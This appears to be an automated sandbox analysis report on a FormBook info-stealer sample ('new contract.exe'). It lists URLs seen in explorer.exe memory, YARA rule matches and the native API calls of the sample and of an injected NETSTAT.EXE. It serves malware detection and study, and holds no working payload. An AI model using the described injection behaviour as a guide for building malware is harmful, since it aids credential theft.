Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000000.1762772794.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A320 NtCreateFile, 2_2_0041A320
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A3D0 NtReadFile, 2_2_0041A3D0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A450 NtClose, 2_2_0041A450
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A500 NtAllocateVirtualMemory, 2_2_0041A500
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A2DA NtCreateFile, 2_2_0041A2DA
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041A44A NtClose, 2_2_0041A44A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662B60 NtClose,LdrInitializeThunk, 2_2_01662B60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01662BF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662AD0 NtReadFile,LdrInitializeThunk, 2_2_01662AD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662D30 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_01662D30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662D10 NtMapViewOfSection,LdrInitializeThunk, 2_2_01662D10
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01662DF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662DD0 NtDelayExecution,LdrInitializeThunk, 2_2_01662DD0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01662C70
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662CA0 NtQueryInformationToken,LdrInitializeThunk, 2_2_01662CA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662F30 NtCreateSection,LdrInitializeThunk, 2_2_01662F30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662FE0 NtCreateFile,LdrInitializeThunk, 2_2_01662FE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662FB0 NtResumeThread,LdrInitializeThunk, 2_2_01662FB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662F90 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01662F90
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01662EA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662E80 NtReadVirtualMemory,LdrInitializeThunk, 2_2_01662E80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01664340 NtSetContextThread, 2_2_01664340
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01664650 NtSuspendThread, 2_2_01664650
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662BE0 NtQueryValueKey, 2_2_01662BE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662BA0 NtEnumerateValueKey, 2_2_01662BA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662B80 NtQueryInformationFile, 2_2_01662B80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662AF0 NtWriteFile, 2_2_01662AF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662AB0 NtWaitForSingleObject, 2_2_01662AB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662D00 NtSetInformationFile, 2_2_01662D00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662DB0 NtEnumerateKey, 2_2_01662DB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662C60 NtCreateKey, 2_2_01662C60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662C00 NtQueryInformationProcess, 2_2_01662C00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662CF0 NtOpenProcess, 2_2_01662CF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662CC0 NtQueryVirtualMemory, 2_2_01662CC0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662F60 NtCreateProcessEx, 2_2_01662F60
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662FA0 NtQuerySection, 2_2_01662FA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662E30 NtWriteVirtualMemory, 2_2_01662E30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01662EE0 NtQueueApcThread, 2_2_01662EE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663010 NtOpenDirectoryObject, 2_2_01663010
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663090 NtSetValueKey, 2_2_01663090
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016635C0 NtCreateMutant, 2_2_016635C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016639B0 NtGetContextThread, 2_2_016639B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663D70 NtOpenThread, 2_2_01663D70
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01663D10 NtOpenProcessToken, 2_2_01663D10
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E4E12 NtProtectVirtualMemory, 3_2_0E4E4E12
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E3232 NtCreateFile, 3_2_0E4E3232
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E4E0A NtProtectVirtualMemory, 3_2_0E4E4E0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182B60 NtClose,LdrInitializeThunk, 5_2_03182B60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_03182BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_03182BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182AD0 NtReadFile,LdrInitializeThunk, 5_2_03182AD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182F30 NtCreateSection,LdrInitializeThunk, 5_2_03182F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182FE0 NtCreateFile,LdrInitializeThunk, 5_2_03182FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_03182EA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_03182D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182DD0 NtDelayExecution,LdrInitializeThunk, 5_2_03182DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03182DF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03182C70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182C60 NtCreateKey,LdrInitializeThunk, 5_2_03182C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_03182CA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031835C0 NtCreateMutant,LdrInitializeThunk, 5_2_031835C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03184340 NtSetContextThread, 5_2_03184340
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03184650 NtSuspendThread, 5_2_03184650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182B80 NtQueryInformationFile, 5_2_03182B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182BA0 NtEnumerateValueKey, 5_2_03182BA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182AB0 NtWaitForSingleObject, 5_2_03182AB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182AF0 NtWriteFile, 5_2_03182AF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182F60 NtCreateProcessEx, 5_2_03182F60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182F90 NtProtectVirtualMemory, 5_2_03182F90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182FB0 NtResumeThread, 5_2_03182FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182FA0 NtQuerySection, 5_2_03182FA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182E30 NtWriteVirtualMemory, 5_2_03182E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182E80 NtReadVirtualMemory, 5_2_03182E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182EE0 NtQueueApcThread, 5_2_03182EE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182D00 NtSetInformationFile, 5_2_03182D00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182D30 NtUnmapViewOfSection, 5_2_03182D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182DB0 NtEnumerateKey, 5_2_03182DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182C00 NtQueryInformationProcess, 5_2_03182C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182CC0 NtQueryVirtualMemory, 5_2_03182CC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03182CF0 NtOpenProcess, 5_2_03182CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183010 NtOpenDirectoryObject, 5_2_03183010
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183090 NtSetValueKey, 5_2_03183090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031839B0 NtGetContextThread, 5_2_031839B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183D10 NtOpenProcessToken, 5_2_03183D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03183D70 NtOpenThread, 5_2_03183D70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A320 NtCreateFile, 5_2_0052A320
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A3D0 NtReadFile, 5_2_0052A3D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A450 NtClose, 5_2_0052A450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A500 NtAllocateVirtualMemory, 5_2_0052A500
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A2DA NtCreateFile, 5_2_0052A2DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052A44A NtClose, 5_2_0052A44A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 5_2_02DB9BAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 5_2_02DBA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_02DB9BB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBA042 NtQueryInformationProcess, 5_2_02DBA042
Detected potential crypto function
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_077B07B0 0_2_077B07B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_077A4D3B 0_2_077A4D3B
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_014BD5BC 0_2_014BD5BC
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_07988348 0_2_07988348
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_07981E18 0_2_07981E18
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_07981E28 0_2_07981E28
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_07983668 0_2_07983668
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_07983AA0 0_2_07983AA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_07982260 0_2_07982260
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_079819F0 0_2_079819F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 0_2_079819E1 0_2_079819E1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041E803 2_2_0041E803
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041E1C7 2_2_0041E1C7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041DD0B 2_2_0041DD0B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00402D88 2_2_00402D88
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041E5A5 2_2_0041E5A5
